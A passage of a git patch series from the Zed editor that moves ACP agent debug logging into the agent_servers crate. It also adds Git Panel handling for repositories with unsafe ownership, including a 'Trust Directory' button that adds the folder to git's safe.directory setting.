{ Some(connection) => { if connection.messages.is_empty() { h_flex() @@ -781,12 +779,23 @@ impl Render for AcpTools { .into_any() } } - None => h_flex() - .size_full() - .justify_center() - .items_center() - .child("No active connection") - .into_any(), + None => match self.selected_connection_status(cx) { + Some(AgentConnectionStatus::Connecting) => h_flex() + .size_full() + .justify_center() + .items_center() + .child(format!( + "Reconnecting to {}", + self.selected_connection_label() + )) + .into_any(), + _ => h_flex() + .size_full() + .justify_center() + .items_center() + .child("No active connection") + .into_any(), + }, }) } } @@ -803,45 +812,8 @@ impl AcpToolsToolbarItemView { impl Render for AcpToolsToolbarItemView { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { - let Some(acp_tools) = self.acp_tools.as_ref() else { - return Empty.into_any_element(); - }; - - let acp_tools = acp_tools.clone(); - let connection_registry = acp_tools.read(cx).connection_registry.clone(); - let has_messages = acp_tools - .read(cx) - .watched_connection - .as_ref() - .is_some_and(|connection| !connection.messages.is_empty()); - - h_flex() - .gap_2() - .child({ - let message = acp_tools - .read(cx) - .serialize_observed_messages() - .unwrap_or_default(); - - CopyButton::new("copy-all-messages", message) - .tooltip_label("Copy All Messages") - .disabled(!has_messages) - }) - .child( - IconButton::new("clear_messages", IconName::Trash) - .icon_size(IconSize::Small) - .tooltip(Tooltip::text("Clear Messages")) - .disabled(!has_messages) - .on_click(cx.listener(move |_this, _, _window, cx| { - connection_registry.update(cx, |registry, cx| { - registry.clear_messages(cx); - }); - acp_tools.update(cx, |acp_tools, cx| { - acp_tools.clear_messages(cx); - }); - })), - ) - .into_any() + let _ = (&self.acp_tools, cx); + Empty.into_any_element() } } @@ -859,7 +831,7 @@ impl ToolbarItemView for AcpToolsToolbarItemView { { self.acp_tools = Some(acp_tools); cx.notify(); - return ToolbarItemLocation::PrimaryRight; + return ToolbarItemLocation::Hidden; } if self.acp_tools.take().is_some() { cx.notify(); diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index 1a12a5415731b4..e58a0ce81d4e0b 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -6,7 +6,7 @@ publish.workspace = true license = "GPL-3.0-or-later" [features] -test-support = ["acp_tools/test-support", "acp_thread/test-support", "gpui/test-support", "project/test-support", "dep:env_logger", "client/test-support", "dep:gpui_tokio", "reqwest_client/test-support"] +test-support = ["acp_thread/test-support", "gpui/test-support", "project/test-support", "dep:env_logger", "client/test-support", "dep:gpui_tokio", "reqwest_client/test-support"] e2e = [] [lints] @@ -17,7 +17,6 @@ path = "src/agent_servers.rs" doctest = false [dependencies] -acp_tools.workspace = true acp_thread.workspace = true action_log.workspace = true async-channel.workspace = true diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 57ca7ddeac7a77..832b6afe04873a 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -2,13 +2,13 @@ use acp_thread::{ AgentConnection, AgentSessionInfo, AgentSessionList, AgentSessionListRequest, AgentSessionListResponse, }; -use acp_tools::AcpConnectionRegistry; use action_log::ActionLog; use agent_client_protocol::schema::{self as acp, ErrorCode}; use agent_client_protocol::{ Agent, Client, ConnectionTo, JsonRpcResponse, Lines, Responder, SentRequest, }; use anyhow::anyhow; +use async_channel; use collections::HashMap; use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _}; use futures::channel::mpsc; @@ -22,8 +22,8 @@ use serde::Deserialize; use std::path::PathBuf; use std::process::Stdio; use std::rc::Rc; -use std::sync::Arc; -use std::{any::Any, cell::RefCell}; +use std::sync::{Arc, Mutex}; +use std::{any::Any, cell::RefCell, collections::VecDeque}; use task::{Shell, ShellBuilder, SpawnInTerminal}; use thiserror::Error; use util::ResultExt as _; @@ -40,6 +40,162 @@ use terminal::terminal_settings::{AlternateScroll, CursorShape}; use crate::GEMINI_ID; pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli"; +const MAX_DEBUG_BACKLOG_MESSAGES: usize = 2000; + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +pub enum AcpDebugMessageDirection { + Incoming, + Outgoing, + Stderr, +} + +#[derive(Clone)] +pub enum AcpDebugMessageContent { + Request { + id: acp::RequestId, + method: Arc, + params: Option, + }, + Response { + id: acp::RequestId, + result: Result, acp::Error>, + }, + Notification { + method: Arc, + params: Option, + }, + Stderr { + line: Arc, + }, +} + +#[derive(Clone)] +pub struct AcpDebugMessage { + pub direction: AcpDebugMessageDirection, + pub message: AcpDebugMessageContent, +} + +impl AcpDebugMessage { + fn parse(direction: AcpDebugMessageDirection, line: &str) -> Option { + if direction == AcpDebugMessageDirection::Stderr { + return Some(Self { + direction, + message: AcpDebugMessageContent::Stderr { + line: Arc::from(line), + }, + }); + } + + let value: serde_json::Value = serde_json::from_str(line).ok()?; + let object = value.as_object()?; + + let parsed_id = object + .get("id") + .map(|raw| serde_json::from_value::(raw.clone())); + + let message = if let Some(method) = object.get("method").and_then(|method| method.as_str()) + { + match parsed_id { + Some(Ok(id)) => AcpDebugMessageContent::Request { + id, + method: method.into(), + params: object.get("params").cloned(), + }, + Some(Err(err)) => { + log::warn!("Skipping JSON-RPC message with unparsable id: {err}"); + return None; + } + None => AcpDebugMessageContent::Notification { + method: method.into(), + params: object.get("params").cloned(), + }, + } + } else if let Some(parsed_id) = parsed_id { + let id = match parsed_id { + Ok(id) => id, + Err(err) => { + log::warn!("Skipping JSON-RPC response with unparsable id: {err}"); + return None; + } + }; + + if let Some(error) = object.get("error") { + let acp_error = + serde_json::from_value::(error.clone()).unwrap_or_else(|err| { + log::warn!("Failed to deserialize ACP error: {err}"); + acp::Error::internal_error().data(error.to_string()) + }); + + AcpDebugMessageContent::Response { + id, + result: Err(acp_error), + } + } else { + AcpDebugMessageContent::Response { + id, + result: Ok(object.get("result").cloned()), + } + } + } else { + return None; + }; + + Some(Self { direction, message }) + } +} + +#[derive(Default)] +struct AcpDebugLogState { + messages: VecDeque, + subscribers: Vec>, +} + +#[derive(Clone, Default)] +struct AcpDebugLog { + state: Arc>, +} + +impl AcpDebugLog { + fn subscribe( + &self, + ) -> ( + Vec, + async_channel::Receiver, + ) { + let mut state = self + .state + .lock() + .unwrap_or_else(|poisoned| poisoned.into_inner()); + let backlog = state.messages.iter().cloned().collect(); + let (sender, receiver) = async_channel::unbounded(); + state.subscribers.push(sender); + (backlog, receiver) + } + + fn record_line(&self, direction: AcpDebugMessageDirection, line: &str) { + let Some(message) = AcpDebugMessage::parse(direction, line) else { + return; + }; + self.record_message(message); + } + + fn record_message(&self, message: AcpDebugMessage) { + let mut state = self + .state + .lock() + .unwrap_or_else(|poisoned| poisoned.into_inner()); + + if state.messages.len() == MAX_DEBUG_BACKLOG_MESSAGES { + state.messages.pop_front(); + } + state.messages.push_back(message.clone()); + + state.subscribers.retain(|sender| !sender.is_closed()); + for sender in &state.subscribers { + sender.try_send(message.clone()).log_err(); + } + } +} /// Awaits the response to an ACP request from a GPUI foreground task. /// @@ -240,6 +396,7 @@ pub struct AcpConnection { default_config_options: HashMap, child: Option, session_list: Option>, + debug_log: AcpDebugLog, _io_task: Task<()>, _dispatch_task: Task<()>, _wait_task: Task>, @@ -484,6 +641,15 @@ fn connect_client_future( } impl AcpConnection { + pub fn subscribe_debug_messages( + &self, + ) -> ( + Vec, + async_channel::Receiver, + ) { + self.debug_log.subscribe() + } + pub async fn stdio( agent_id: AgentId, project: Entity, @@ -563,39 +729,28 @@ impl AcpConnection { // Set up the foreground dispatch channel for bridging Send handler // closures to the !Send foreground thread. let (dispatch_tx, dispatch_rx) = mpsc::unbounded::(); - - // Register this connection with the logs panel registry. The - // returned tap is opt-in: until someone subscribes to the ACP logs - // panel, `emit_*` calls below are ~free (atomic load + return). - let log_tap = cx.update(|cx| { - AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| { - registry.set_active_connection(agent_id.clone(), cx) - }) - }); + let debug_log = AcpDebugLog::default(); let incoming_lines = futures::io::BufReader::new(stdout).lines(); let tapped_incoming = incoming_lines.inspect({ - let log_tap = log_tap.clone(); + let debug_log = debug_log.clone(); move |result| match result { - Ok(line) => log_tap.emit_incoming(line), + Ok(line) => debug_log.record_line(AcpDebugMessageDirection::Incoming, line), Err(err) => { - // I/O errors on the transport are fatal for the SDK, but - // without logging them the ACP logs panel shows no trace - // of why the connection died. log::warn!("ACP transport read error: {err}"); } } }); let tapped_outgoing = futures::sink::unfold( - (Box::pin(stdin), log_tap.clone()), - async move |(mut writer, log_tap), line: String| { + (Box::pin(stdin), debug_log.clone()), + async move |(mut writer, debug_log), line: String| { use futures::AsyncWriteExt; - log_tap.emit_outgoing(&line); + debug_log.record_line(AcpDebugMessageDirection::Outgoing, &line); let mut bytes = line.into_bytes(); bytes.push(b'\n'); writer.write_all(&bytes).await?; - Ok::<_, std::io::Error>((writer, log_tap)) + Ok::<_, std::io::Error>((writer, debug_log)) }, ); @@ -633,7 +788,7 @@ impl AcpConnection { }); let stderr_task = cx.background_spawn({ - let log_tap = log_tap.clone(); + let debug_log = debug_log.clone(); async move { let mut stderr = BufReader::new(stderr); let mut line = String::new(); @@ -642,7 +797,7 @@ impl AcpConnection { { let trimmed = line.trim_end_matches(['\n', '\r']); log::warn!("agent stderr: {trimmed}"); - log_tap.emit_stderr(trimmed); + debug_log.record_line(AcpDebugMessageDirection::Stderr, trimmed); line.clear(); } Ok(()) @@ -738,6 +893,7 @@ impl AcpConnection { default_model, default_config_options, session_list, + debug_log, _io_task: io_task, _dispatch_task: dispatch_task, _wait_task: wait_task, @@ -774,6 +930,7 @@ impl AcpConnection { default_config_options: HashMap::default(), child: None, session_list: None, + debug_log: AcpDebugLog::default(), _io_task: io_task, _dispatch_task: dispatch_task, _wait_task: Task::ready(Ok(())), diff --git a/crates/agent_servers/src/agent_servers.rs b/crates/agent_servers/src/agent_servers.rs index 9c1d36bf9a7ff7..64e97de229959d 100644 --- a/crates/agent_servers/src/agent_servers.rs +++ b/crates/agent_servers/src/agent_servers.rs @@ -22,7 +22,10 @@ use std::{any::Any, rc::Rc, sync::Arc}; pub use acp::test_support::{ FakeAcpAgentServer, FakeAcpConnectionHarness, connect_fake_acp_connection, }; -pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID}; +pub use acp::{ + AcpConnection, AcpDebugMessage, AcpDebugMessageContent, AcpDebugMessageDirection, + GEMINI_TERMINAL_AUTH_METHOD_ID, +}; pub struct AgentServerDelegate { store: Entity, diff --git a/crates/agent_ui/src/agent_connection_store.rs b/crates/agent_ui/src/agent_connection_store.rs index 218347d5c57c21..a01f19dd0f222b 100644 --- a/crates/agent_ui/src/agent_connection_store.rs +++ b/crates/agent_ui/src/agent_connection_store.rs @@ -1,6 +1,7 @@ use std::rc::Rc; use acp_thread::{AgentConnection, LoadError}; +use agent_servers::AcpConnection; use agent_servers::{AgentServer, AgentServerDelegate}; use anyhow::Result; use collections::HashMap; @@ -58,6 +59,12 @@ pub enum AgentConnectionEntryEvent { impl EventEmitter for AgentConnectionEntry {} +#[derive(Clone)] +pub struct ActiveAcpConnection { + pub agent_id: project::AgentId, + pub connection: Rc, +} + pub struct AgentConnectionStore { project: Entity, entries: HashMap>, @@ -90,6 +97,25 @@ impl AgentConnectionStore { .unwrap_or(AgentConnectionStatus::Disconnected) } + pub fn active_acp_connections(&self, cx: &App) -> Vec { + self.entries + .values() + .filter_map(|entry| match entry.read(cx) { + AgentConnectionEntry::Connected(state) => state + .connection + .clone() + .downcast::() + .map(|connection| ActiveAcpConnection { + agent_id: state.connection.agent_id(), + connection, + }), + AgentConnectionEntry::Connecting { .. } | AgentConnectionEntry::Error { .. } => { + None + } + }) + .collect() + } + pub fn restart_connection( &mut self, key: Agent, @@ -144,6 +170,7 @@ impl AgentConnectionStore { } }) .ok(); + cx.notify(); }) .ok(); } diff --git a/crates/agent_ui/src/agent_ui.rs b/crates/agent_ui/src/agent_ui.rs index d7a8adf80ec953..4e37911f29497e 100644 --- a/crates/agent_ui/src/agent_ui.rs +++ b/crates/agent_ui/src/agent_ui.rs @@ -1,5 +1,5 @@ mod agent_configuration; -pub(crate) mod agent_connection_store; +pub mod agent_connection_store; mod agent_diff; mod agent_model_selector; mod agent_panel; @@ -60,6 +60,7 @@ use std::any::TypeId; use workspace::Workspace; use crate::agent_configuration::{ConfigureContextServerModal, ManageProfilesModal}; +pub use crate::agent_connection_store::{ActiveAcpConnection, AgentConnectionStore}; pub use crate::agent_panel::{AgentPanel, AgentPanelEvent, MaxIdleRetainedThreads}; use crate::agent_registry_ui::AgentRegistryPage; pub use crate::inline_assistant::InlineAssistant; From c4a6d1ec17bc91681fcd5da8e7ce9e3426939d77 Mon Sep 17 00:00:00 2001 From: Dino Date: Fri, 24 Apr 2026 18:14:24 +0100 Subject: [PATCH 025/231] git: Improve handling of unsafe repositories (#43693) These changes update Zed's Git Panel to be able to detect unsafe git repositories, where the user running Zed doesn't own the `.git` directory, and show a dedicated empty view in the Git Panel that not only explains the situation but also allows the user to choose whether to trust this directory, which will end up running `git config --global --add safe.directory `. While testing those changes, it was noted that attempting to add or reset files after trusting the directory would fail, as expected, but the UI wouldn't react to the fact that those operations failed. What this means is, if the user tried to add a file, the UI would show a checkmark for that file and, after the operation failed, the checkmark would remain. We now revert that, for both `git add` and `git reset`. Some more technical notes on this change: - Introduce `project::git_store::GitAccess` enum to express whether we actually have access to the repository, exposed via `git::Repository::access`, which probes the backend with a `git status` command and classifies the result. - On unsafe repositories, `project::git_store::LocalRepositoryState::new` fails to spawn the git worker, which now cleanly signals `GitAccess::No` rather than leaving the panel in a broken state. - Updated `git_ui::git_panel::GitPanel::render_empty_state` with a third alternative, when `GitAccess::No`, that basically renders a view explaining why the repository is considered unsafe, together with buttons for git's documentation on safe directories and a button to add the repository's folder as a safe directory - Updated `project::git_store::GitStore` to now watch `~/.gitconfig` and `$XDG_CONFIG_HOME/git/config`. Watching this files allows the Git Panel to react when the git configuration is updated, which will be the case if the user decides to trust the repository. When either changes, a `GitStoreEvent::GlobalConfigurationUpdated` event is emitted and the panel refetches repository state. - Added `project::git_store::Repository::refetch_repo_state` field, which stores a closure to allow recreating the `Repository::repository_state` and the job sender after the repository's directory is trusted, without requiring a project reload. - Added a `fs::Fs::git_config` trait method, wrapping a real `git config` invocation. In order to be able to call this, both `git_store::GitStore::git_config` and `project::Project::git_config` wrappers have also been introduced. Worth mentioning that this isn't yet supported for remote projects or collab guests. - Updated `fs::Fs::git_clone` argument order to match `fs::Fs::git_config` and `fs::Fs::git_init`. - Added a new `project::git_store::pending_op::PendingOps::last_op_errored` method that allows determining whether the last pending operation failed. This now allows us to filter out failed operations when determining whether `git add` or `git reset` failed, so that we can fall through to the real git status. - Updated `git_ui::git_panel::GitPanel::change_file_stage` to now call `update_counts` in its error branch so the cached staged counters stay consistent with the reverted per-entry state, seeing as we now handle reverting the UI state if an operation fails. - Fixed `fs::RealFs::git_init` to fall back to the provided branch name when `git config --global --get init.defaultBranch` fails, for example, when the user hsan't configured one. Co-authored-by: cameron Closes #42286 Release Notes: - Added a dedicated empty state in the Git Panel for unsafe repositories, with a "Trust Directory" button that adds the repository to `safe.directory` - Fixed stage and unstage checkboxes in the Git Panel not reverting when a `git add` or `git reset` command failed --------- Co-authored-by: cameron Co-authored-by: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> --- crates/fs/src/fs.rs | 48 +++-- crates/git_ui/src/clone.rs | 2 +- crates/git_ui/src/git_panel.rs | 231 ++++++++++++++++----- crates/project/src/git_store.rs | 190 ++++++++++++++--- crates/project/src/git_store/pending_op.rs | 6 + crates/project/src/project.rs | 4 + 6 files changed, 391 insertions(+), 90 deletions(-) diff --git a/crates/fs/src/fs.rs b/crates/fs/src/fs.rs index 5b505d4d7a0acc..2d716f8e519bb4 100644 --- a/crates/fs/src/fs.rs +++ b/crates/fs/src/fs.rs @@ -13,7 +13,6 @@ use gpui::BackgroundExecutor; use gpui::Global; use gpui::ReadGlobal as _; use gpui::SharedString; -use std::borrow::Cow; #[cfg(unix)] use std::ffi::CString; use util::command::new_command; @@ -287,7 +286,8 @@ pub trait Fs: Send + Sync { ) -> Result>; async fn git_init(&self, abs_work_directory: &Path, fallback_branch_name: String) -> Result<()>; - async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()>; + async fn git_clone(&self, abs_work_directory: &Path, repo_url: &str) -> Result<()>; + async fn git_config(&self, abs_work_directory: &Path, args: Vec) -> Result; fn is_fake(&self) -> bool; async fn is_case_sensitive(&self) -> bool; fn subscribe_to_jobs(&self) -> JobEventReceiver; @@ -1283,19 +1283,19 @@ impl Fs for RealFs { abs_work_directory_path: &Path, fallback_branch_name: String, ) -> Result<()> { - let config = new_command("git") + let result = new_command("git") .current_dir(abs_work_directory_path) .args(&["config", "--global", "--get", "init.defaultBranch"]) .output() - .await?; - - let branch_name; + .await; - if config.status.success() && !config.stdout.is_empty() { - branch_name = String::from_utf8_lossy(&config.stdout); - } else { - branch_name = Cow::Borrowed(fallback_branch_name.as_str()); - } + // In case the `git config` command fails, which would be the case if + // the user doesn't have an `init.defaultBranch` value set, we'll just + // default to the provided `fallback_branch_name`. + let branch_name = match result { + Ok(output) if !output.stdout.is_empty() => String::from_utf8(output.stdout)?, + _ => fallback_branch_name, + }; new_command("git") .current_dir(abs_work_directory_path) @@ -1307,7 +1307,7 @@ impl Fs for RealFs { Ok(()) } - async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()> { + async fn git_clone(&self, abs_work_directory: &Path, repo_url: &str) -> Result<()> { let job_id = self.next_job_id.fetch_add(1, Ordering::SeqCst); let job_info = JobInfo { id: job_id, @@ -1333,6 +1333,24 @@ impl Fs for RealFs { Ok(()) } + /// Runs `git config` with the given arguments. + /// Will return `Ok` if the commands exit status is `0`, with the stdout + /// contents. Otherwise returns `Err` with the stderr contents. + async fn git_config(&self, abs_work_directory: &Path, args: Vec) -> Result { + let output = new_command("git") + .current_dir(abs_work_directory) + .args([String::from("config")].into_iter().chain(args)) + .output() + .await?; + + if !output.status.success() { + let err = String::from_utf8(output.stderr)?; + anyhow::bail!(err); + } + + String::from_utf8(output.stdout).map_err(Into::into) + } + fn is_fake(&self) -> bool { false } @@ -3245,10 +3263,14 @@ impl Fs for FakeFs { self.create_dir(&abs_work_directory_path.join(".git")).await } - async fn git_clone(&self, _repo_url: &str, _abs_work_directory: &Path) -> Result<()> { + async fn git_clone(&self, _abs_work_directory: &Path, _repo_url: &str) -> Result<()> { anyhow::bail!("Git clone is not supported in fake Fs") } + async fn git_config(&self, _abs_work_directory: &Path, _args: Vec) -> Result { + anyhow::bail!("Git config is not supported in fake Fs") + } + fn is_fake(&self) -> bool { true } diff --git a/crates/git_ui/src/clone.rs b/crates/git_ui/src/clone.rs index b3b8a9ed6fb302..61b6275eb91221 100644 --- a/crates/git_ui/src/clone.rs +++ b/crates/git_ui/src/clone.rs @@ -39,7 +39,7 @@ pub fn clone_and_open( let destination_dir = destination_dir.clone(); let repo_url = repo_url.clone(); cx.spawn(async move |_workspace, _cx| { - fs.git_clone(&repo_url, destination_dir.as_path()).await + fs.git_clone(destination_dir.as_path(), &repo_url).await }) }) .ok()?; diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index ebb2e3c1c26206..1e53c1cf53e315 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -22,6 +22,7 @@ use editor::{ use editor::{EditorStyle, RewrapOptions}; use file_icons::FileIcons; use futures::StreamExt as _; +use futures::channel::oneshot::Canceled; use git::commit::ParsedCommitMessage; use git::repository::{ Branch, CommitDetails, CommitOptions, CommitSummary, DiffType, FetchOptions, GitCommitTemplate, @@ -51,6 +52,7 @@ use menu; use multi_buffer::ExcerptBoundaryInfo; use notifications::status_toast::StatusToast; use panel::{PanelHeader, panel_button, panel_filled_button, panel_icon_button}; +use project::git_store::GitAccess; use project::{ Fs, Project, ProjectPath, git_store::{GitStoreEvent, Repository, RepositoryEvent, RepositoryId, pending_op}, @@ -656,6 +658,7 @@ pub struct GitPanel { stash_entries: GitStash, _settings_subscription: Subscription, + git_access: GitAccess, } #[derive(Clone, Debug, PartialEq, Eq)] @@ -786,6 +789,7 @@ impl GitPanel { ) | GitStoreEvent::RepositoryAdded | GitStoreEvent::RepositoryRemoved(_) + | GitStoreEvent::GlobalConfigurationUpdated | GitStoreEvent::ActiveRepositoryChanged(_) => { this.schedule_update(window, cx); } @@ -843,6 +847,7 @@ impl GitPanel { bulk_staging: None, stash_entries: Default::default(), _settings_subscription, + git_access: GitAccess::Yes, }; this.schedule_update(window, cx); @@ -1744,11 +1749,18 @@ impl GitPanel { // 3. finally, if there is no info about this `entry` in the repo, we fall back to whatever status is encoded // in `entry` arg. repo.pending_ops_for_path(&entry.repo_path) - .map(|ops| { + .and_then(|ops| { + // In case the last operation in the list of pending operations + // failed, we can't assume the stage status for this entry and + // need to fallback to the actual state in the repo. + if ops.last_op_errored() { + return None; + } + if ops.staging() || ops.staged() { - StageStatus::Staged + Some(StageStatus::Staged) } else { - StageStatus::Unstaged + Some(StageStatus::Unstaged) } }) .or_else(|| { @@ -1950,6 +1962,7 @@ impl GitPanel { this.update(cx, |this, cx| { if let Err(err) = result { this.show_error_toast(if stage { "add" } else { "reset" }, err, cx); + this.update_counts(active_repository.read(cx)); } cx.notify(); }) @@ -3110,6 +3123,37 @@ impl GitPanel { .detach_and_log_err(cx); } + /// Updates git's configuration, adding the directory of the current + /// worktree to the `safe.directory` config, ensuring that, even if the user + /// that's running the application is not the owner of `.git/`, it can still + /// read the repository's contents. + fn add_safe_directory(&mut self, window: &mut Window, cx: &mut Context) { + let Some(active_repository) = &self.active_repository else { + return; + }; + + let path = active_repository.update(cx, |repository, _cx| { + repository.snapshot().work_directory_abs_path + }); + + if let Some(path_str) = path.to_str() { + let path_arg = String::from(path_str); + let args = vec![ + String::from("--global"), + String::from("--add"), + String::from("safe.directory"), + path_arg, + ]; + + cx.spawn_in(window, async move |git_panel, cx| { + git_panel.update(cx, |git_panel, cx| { + git_panel.project.read(cx).git_config(path, args, cx) + }) + }) + .detach(); + } + } + pub fn create_pull_request(&self, window: &mut Window, cx: &mut Context) { let result = (|| -> anyhow::Result<()> { let repo = self @@ -3507,11 +3551,37 @@ impl GitPanel { self.tracked_staged_count = 0; self.entry_count = 0; self.max_width_item_index = None; + self.git_access = GitAccess::Yes; let sort_by_path = GitPanelSettings::get_global(cx).sort_by_path; let is_tree_view = matches!(self.view_mode, GitPanelViewMode::Tree(_)); let group_by_status = is_tree_view || !sort_by_path; + if let Some(active_repo) = self.active_repository.as_ref() { + let access = active_repo.update(cx, |active_repo, cx| active_repo.access(cx)); + + cx.spawn_in(window, async move |git_panel, cx| { + // When the user does not own the `.git` folder, the + // `GitStore.spawn_local_git_worker` will fail to create the + // receiver for Git jobs, so this access check will be + // cancelled. + // + // We assume `GitAccess::No` on cancellation. I believe this is + // imprecise, other failures could also cause cancellation, but + // the consequence is just showing the "unsafe repo" UI, which + // seems acceptable for this edge case. + let access = match access.await { + Ok(access) => access, + Err(Canceled) => GitAccess::No, + }; + + git_panel.update(cx, |this, _cx| { + this.git_access = access; + }) + }) + .detach_and_log_err(cx); + } + let mut changed_entries = Vec::new(); let mut new_entries = Vec::new(); let mut conflict_entries = Vec::new(); @@ -4205,6 +4275,10 @@ impl GitPanel { window: &mut Window, cx: &mut Context, ) -> Option { + if matches!(self.git_access, GitAccess::No) { + return None; + } + self.active_repository.as_ref()?; let (text, action, stage, tooltip) = @@ -4659,17 +4733,10 @@ impl GitPanel { } fn render_empty_state(&self, cx: &mut Context) -> impl IntoElement { - let has_repo = self.active_repository.is_some(); - let has_no_repo = self.active_repository.is_none(); - let worktree_count = self.project.read(cx).visible_worktrees(cx).count(); - - let should_show_branch_diff = - has_repo && self.changes_count == 0 && !self.is_on_main_branch(cx); - - let label = if has_repo { - "No changes to commit" - } else { - "No Git repositories" + let children = match (self.git_access, &self.active_repository) { + (GitAccess::No, Some(repository)) => self.render_unsafe_repo_ui(repository, cx), + (_, None) => self.render_uninitialized_ui(cx), + (_, Some(_)) => self.render_no_changes_ui(cx), }; v_flex() @@ -4677,40 +4744,110 @@ impl GitPanel { .flex_1() .items_center() .justify_center() - .child(Label::new(label).size(LabelSize::Small).color(Color::Muted)) - .when(has_no_repo && worktree_count > 0, |this| { - this.child( - panel_filled_button("Initialize Repository") - .tooltip(Tooltip::for_action_title_in( - "git init", - &git::Init, - &self.focus_handle, - )) - .on_click(move |_, _, cx| { - cx.defer(move |cx| { - cx.dispatch_action(&git::Init); - }) - }), - ) - }) - .when(should_show_branch_diff, |this| { - this.child( - panel_filled_button("View Branch Diff") - .tooltip(move |_, cx| { - Tooltip::with_meta( - "Branch Diff", - Some(&BranchDiff), - "Show diff between working directory and default branch", - cx, - ) + .text_color(Color::Placeholder.color(cx)) + .children(children) + } + + fn render_no_changes_ui(&self, cx: &Context) -> Vec { + let mut elements: Vec = vec!["No changes to commit".into_any_element()]; + + if self.changes_count == 0 && !self.is_on_main_branch(cx) { + elements.push( + panel_filled_button("View Branch Diff") + .tooltip(move |_, cx| { + Tooltip::with_meta( + "Branch Diff", + Some(&BranchDiff), + "Show diff between working directory and default branch", + cx, + ) + }) + .on_click(move |_, _, cx| { + cx.defer(move |cx| { + cx.dispatch_action(&BranchDiff); }) - .on_click(move |_, _, cx| { - cx.defer(move |cx| { - cx.dispatch_action(&BranchDiff); - }) - }), + }) + .into_any_element(), + ); + } + + elements + } + + fn render_unsafe_repo_ui( + &self, + active_repository: &Entity, + cx: &mut Context, + ) -> Vec { + let directory = active_repository.update(cx, |repository, _cx| { + repository.snapshot().work_directory_abs_path + }); + + let message = format!( + "Detected dubious ownership in repository at {}. \ + This happens when the .git/ directory is not owned by the current user. \ + If you want to learn more about safe directories, visit git's documentation.", + directory.display() + ); + + vec![ + div() + .self_stretch() + .px_4() + .text_center() + .child(Label::new(message).color(Color::Muted)) + .into_any_element(), + self.render_unsafe_repo_buttons(directory, cx) + .into_any_element(), + ] + } + + fn render_unsafe_repo_buttons(&self, directory: Arc, cx: &mut Context) -> Div { + h_flex() + .max_w_full() + .gap_2() + .justify_center() + .child( + panel_filled_button("Trust Directory") + .end_icon(Icon::new(IconName::Check).size(IconSize::Small)) + .tooltip(Tooltip::text( + format!("git config --global --add safe.directory {}", directory.display()) + )) + .on_click( + cx.listener(|this, _, window, cx| { + this.add_safe_directory(window, cx); + }) ) - }) + ) + .child( + panel_filled_button("Learn More") + .end_icon(Icon::new(IconName::Link).size(IconSize::Small)) + .tooltip(Tooltip::text("Open https://git-scm.com/docs/git-config#Documentation/git-config.txt-safedirectory in your default browser")) + .on_click(move |_, _, cx| cx.open_url("https://git-scm.com/docs/git-config#Documentation/git-config.txt-safedirectory")) + ) + } + + fn render_uninitialized_ui(&self, cx: &mut Context) -> Vec { + let worktree_count = self.project.read(cx).visible_worktrees(cx).count(); + if worktree_count > 0 && self.active_repository.is_none() { + vec![ + "No Git Repositories".into_any_element(), + panel_filled_button("Initialize Repository") + .tooltip(Tooltip::for_action_title_in( + "git init", + &git::Init, + &self.focus_handle, + )) + .on_click(move |_, _, cx| { + cx.defer(move |cx| { + cx.dispatch_action(&git::Init); + }) + }) + .into_any_element(), + ] + } else { + vec![] + } } fn is_on_main_branch(&self, cx: &Context) -> bool { @@ -4741,7 +4878,7 @@ impl GitPanel { let is_staging_or_staged = repo .pending_ops_for_path(&repo_path) - .map(|ops| ops.staging() || ops.staged()) + .map(|ops| !ops.last_op_errored() && (ops.staging() || ops.staged())) .or_else(|| { repo.status_for_path(&repo_path) .and_then(|status| status.status.staging().as_bool()) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 71eaca61cfd32c..a6d963bd111beb 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -54,6 +54,7 @@ use language::{ proto::{deserialize_version, serialize_version}, }; use parking_lot::Mutex; +use paths::{config_dir, home_dir}; use pending_op::{PendingOp, PendingOpId, PendingOps, PendingOpsSummary}; use postage::stream::Stream as _; use rpc::{ @@ -163,12 +164,29 @@ enum DiffKind { SinceOid(Option), } +#[derive(Debug, Default, Clone, Copy)] +pub enum GitAccess { + /// Either: + /// - the user owns `.git` + /// - the user doesn't own `.git`, but has both of: + /// - OS-level read permissions + /// - the directory is marked as safe (git config safe.directory) + #[default] + Yes, + + /// The user is not the owner of `.git`, and one of the following is true: + /// - the directory is not marked as safe (git config safe.directory) + /// - the user does not have OS-level read permissions to `.git` + No, +} + enum GitStoreState { Local { next_repository_id: Arc, downstream: Option, project_environment: Entity, fs: Arc, + _fs_watches: Box<[Task<()>]>, }, Remote { upstream_client: AnyProtoClient, @@ -362,6 +380,14 @@ pub struct Repository { initial_graph_data: HashMap<(LogSource, LogOrder), InitialGitGraphData>, commit_data_handler: CommitDataHandlerState, commit_data: HashMap, + refetch_repo_state: Arc< + dyn Fn( + &mut Context, + ) -> ( + mpsc::UnboundedSender, + Shared>>, + ), + >, } impl std::ops::Deref for Repository { @@ -465,6 +491,7 @@ pub enum GitStoreEvent { IndexWriteError(anyhow::Error), JobsUpdated, ConflictsUpdated, + GlobalConfigurationUpdated, } impl EventEmitter for Repository {} @@ -492,6 +519,43 @@ impl GitStore { fs: Arc, cx: &mut Context, ) -> Self { + let _fs_watches = if fs.is_fake() { + Box::new([]) + } else { + [ + config_dir().join("git/config"), + home_dir().join(".gitconfig"), + ] + .into_iter() + .map(|path| { + let fs = fs.clone(); + + cx.spawn(async move |this, cx| { + let watcher = fs.watch(&path, 